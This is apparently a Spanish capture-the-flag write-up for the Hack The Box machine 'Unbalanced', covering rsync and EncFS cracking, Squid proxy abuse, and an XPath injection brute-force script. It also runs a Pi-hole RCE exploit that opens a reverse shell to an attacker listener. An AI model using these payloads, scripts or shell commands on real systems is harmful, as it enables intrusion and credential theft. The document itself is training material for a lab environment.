# Unbalanced

**OS**: Linux \
**Dificultad**: Difícil \
**Puntos**: 40

## Resumen

- Rsync
- EncFS Encryption Folder
- Squid http Proxy
- Squid Client
- XPath Injection
- Pi-Hole Exploit (CVE-2020-8816)

## Nmap Scan

`nmap -Pn -sV -sC -p- 10.10.10.200`

```
Nmap scan report for 10.10.10.200
Host is up (0.055s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 a2:76:5c:b0:88:6f:9e:62:e8:83:51:e7:cf:bf:2d:f2 (RSA)
|   256 d0:65:fb:f6:3e:11:b1:d6:e6:f7:5e:c0:15:0c:0a:77 (ECDSA)
|_  256 5e:2b:93:59:1d:49:28:8d:43:2c:c1:f7:e3:37:0f:83 (ED25519)
873/tcp  open  rsync      (protocol version 31)
3128/tcp open  http-proxy Squid http proxy 4.6
|_http-server-header: squid/4.6
|_http-title: ERROR: The requested URL could not be retrieved
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

## Enumeración

Accediendo al puerto 3128 que está corriendo el servicio **squid http proxy 4.6** solo se visualiza un página de error.

![1](img/1.png)

### Rsync

Podemos ver que hay un puerto 873 abierto que está corriendo el servicio rsync. Utilizando el comando **rsync** podemos conectarnos al servicio.

> Rsync, que significa "sincronización remota", es una herramienta de sincronización de archivos local y remota. Utiliza un algoritmo que minimiza la cantidad de datos copiados moviendo solo las partes de los archivos que han cambiado.

`rsync -a rsync://10.10.10.200:873`

![2](img/2.png)

Se encuentran el directorio **conf_backups** el cual descargaremos.

`rsync -a rsync://10.10.10.200:873/conf_backups conf_backups`

![3](img/3.png)

### EncFS Encryption Folder

Después de analizar los archivos nos damos cuenta de que están encriptados con **EncFS encryption**.

> Encfs es una aplicación que le permite crear directorios encriptados, cualquier archivo que se coloque en dicho directorio estará encriptado. Para abrir un directorio encriptado, necesita una contraseña correcta.

Podemos utilizar **encfs2john.py** para crear un hash que contiene el password. 

- `locate encfs2john`
- `python /usr/share/john/encfs2john.py conf_backups/ > backups_hash.txt`

![4](img/4.png)

Procedemos a crackear el hash con la herramienta **john**.

`sudo john backups_hash.txt -wordlist=/usr/share/wordlists/rockyou.txt`

![5](img/5.png)

```
conf_backups: bubblegum
```

Para montar el directorio encriptado usaremos la herramienta **encfs**.

> Instalación: sudo apt install encfs

Creamos un directorio donde montaremos los archivos encriptados.

- `mkdir decrypt_conf`
- `encfs ~/htb/Box/Linux/Unbalanced/conf_backups/ ~/htb/Box/Linux/Unbalanced/decrypt_conf/`

![6](img/6.png)

Ahora es posible ver los archivos en texto plano. Revisando los archivos el más interesante es **squid.conf**, ya que el servicio está corriendo en el puerto 3128.

Podemos ver un Access Control List (ACL).

![7](img/7.png)

También un nuevo subdominio.

![8](img/8.png)

Y lo que parece ser un password.

![9](img/9.png)

### Squid http Proxy

Teniendo en cuenta toda la información anterior, lo que necesitaremos hacer es instalar **squid proxy** en nuestra máquina y reemplazar **squid.conf** por el que está en el directorio **decrypt_conf** y levantar el servicio.

> Squid es un servidor proxy para web con caché. Entre sus utilidades está la de mejorar el rendimiento de las conexiones de empresas y particulares a Internet guardando en caché peticiones recurrentes a servidores web y DNS, acelerar el acceso a un servidor web determinado o añadir seguridad realizando filtrados de tráfico.

> Instalación: sudo apt install squid

- `cp decrypt_conf/squid.conf .`
- `sudo rm /etc/squid/squid.conf`
- `sudo cp squid.conf /etc/squid/`
- `sudo systemctl start squid.service`
- `sudo systemctl status squid.service`

![10](img/10.png)

Agregamos el subdominio a nuestro archivo **hosts**.

##### /etc/hosts

```
10.10.10.200    intranet.unbalanced.htb unbalanced.htb 
```

Ahora configuramos nuestro proxy con **Foxy Proxy** y accedemos a la página.

![11](img/11.png)

`http://intranet.unbalanced.htb/intranet.php`

![12](img/12.png)

Después de probar diferentes cosas en la página no se consiguió nada relevante.

### Squid Client

Investigando un poco más encontramos que podemos usar **squidclient** para conectarnos al servicio y si recordamos hay un password que nos permitirá hacer consultas.

> Instalación: sudo apt install squidclient

`squidclient -h 10.10.10.200 -w 'Thah$Sh1' mgr:menu`

![13](img/13.png)

Podemos ver que se conecta exitosamente y nos muestra los comandos disponibles. Usando el comando **mgr:fqdncache** nos regresa información de subdominios e IP's.

`squidclient -h 10.10.10.200 -w 'Thah$Sh1' mgr:fqdncache`

![14](img/14.png)

Probando cada subdominio e IP, nos regresa la misma página que hemos visto pero algo curioso es que en la IP **172.31.179.1** es posible hacer bypass del formulario de inicio de sesión y nos arroja información de empleados.

`http://172.31.179.1/intranet.php`

![15](img/15.png)

### XPath Injection

> La inyección XPath es una técnica de ataque utilizada para explotar aplicaciones que construyen consultas XPath (lenguaje de ruta XML) a partir de entradas proporcionadas por el usuario para consultar o navegar por documentos XML.

Ejecutando varios queries nos damos cuenta de que es **XPath Injection** podemos ver la diferente respuesta del servidor cuando existe una letra del password con el siguiente query.

```
Username = rita
Password = ' or Username='rita' and substring(Password,1,1)='0
```

![16](img/16.png)

```
Username = rita
Password = ' or Username='rita' and substring(Password,1,1)='p
```

![17](img/17.png)

Tomando esto en cuenta podemos crear un script para iterar letras hasta obtener todo el password.

##### xpath.py

```python
import string
import requests

url = 'http://172.31.179.1/intranet.php'
proxy = 'http://10.10.10.200:3128'
users = ['rita', 'jim', 'bryan', 'sarah']

def invalid_auth():
    data = {
        'Username':'', 'Password':"' or Username='rita' and substring(Password,0,1)='x"
    }
    request = requests.post(url, data=data, proxies={'http':proxy})
    response = len(request.text)
    return response

def brute_force(user):
    user_password = ''
    position = 1
    
    while True:
        for char in string.printable:
            data = {
               'Username':'', 'Password':"' or Username='{0}' and substring(Password,{1},1)='{2}".format(user, position, char)
            }
            response = requests.post(url, data=data, proxies={'http':proxy})

            if len(response.text) != invalid_auth():
                user_password += char
                position += 1
                break

        if char == "'":
            break
     
    return user_password[:-1]

for user in users:
    password = brute_force(user)
    print(user + ":" + password)
```

Ejecutamos el script y esperamos a que nos regrese los passwords.

`python3 xpath.py`

![18](img/18.png)

```
rita:password01!
jim:stairwaytoheaven
bryan:ireallyl0vebubblegum!!!
sarah:sarah4evah
```

Probando las credenciales en el servicio SSH podemos acceder con el usuario **bryan**.

`ssh bryan@10.10.10.200`

![19](img/19.png)

## Escalada de Privilegios (User)

Se puede visualizar un archivo llamado **TODO**, contiene información que nos dice que está instalado un servidor **Pi-Hole** de forma local.

![20](img/20.png)

No se encuentra instalado el comando **netstat** para saber en que puerto está corriendo pero se puede utilizar **/proc/net/tcp**, este [articulo](https://staaldraad.github.io/2017/12/20/netstat-without-netstat/) lo explica bastante bien.

Utilizando el script podemos ver que está el puerto **8080** abierto.

![21](img/21.png)

Podemos hacer un porforwarding para acceder de forma local a ese puerto.

- `ssh -L 8080:127.0.0.1:8080 -N bryan@10.10.10.200`

![22](img/22.png)

Al intentar acceder a la página nos marca un error, especificando **Host: unbalanced.htb** somos capaces de acceder y podemos ver la versión, un subdominio y una IP.

`curl http://127.0.0.1:8080 -H 'Host: unbalanced.htb'`

![23](img/23.png)

### Pi-Hole Exploit (CVE-2020-8816)

Investigando existe un exploit que permite ejecución remota de código ([Pi-hole 4.3.2 Remote Code Execution](https://github.com/AndreyRainchik/CVE-2020-8816/)), haciendo uso de este exploit podemos conseguir una shell como **www-data**.

Es necesario tener el password para poder ejecutar el exploit pero si recordamos el archivo **TODO** menciona que usan un password temporal el cual es **admin**.

Ponemos a la escucha nuestro netcat y ejecutamos el exploit.

- `nc -lvnp 1234`
- `python3 pi-hole.py http://127.0.0.1:8080 admin 10.10.14.197 1234`

![24](img/24.png)

## Escalada de Privilegios (Root)

www-data tiene permisos para leer archivos en el directorio **/root** el cual contiene 2 archivos **ph_install.sh** y **pihole_config.sh**, en el último se encuentra un password el cual puede ser utilizado con el usuario root.

![25](img/25.png)

```
root: bUbBl3gUm$43v3Ry0n3!
```

`su`

![26](img/26.png)

## Referencias
https://linuxize.com/post/how-to-use-rsync-for-local-and-remote-data-transfer-and-synchronization/ \
https://help.ubuntu.com/community/FolderEncryption \
https://linuxconfig.org/how-to-encrypt-directory-with-encfs-on-debian-9-stretch#h7-1-encfs-installation \
http://www.squid-cache.org/ \
https://installlion.com/kali/kali/main/s/squidclient/install/index.html \
https://book.hacktricks.xyz/pentesting-web/xpath-injection \
https://staaldraad.github.io/2017/12/20/netstat-without-netstat/ \
https://github.com/AndreyRainchik/CVE-2020-8816/ \
https://packetstormsecurity.com/files/158737/Pi-hole-4.3.2-Remote-Code-Execution.html
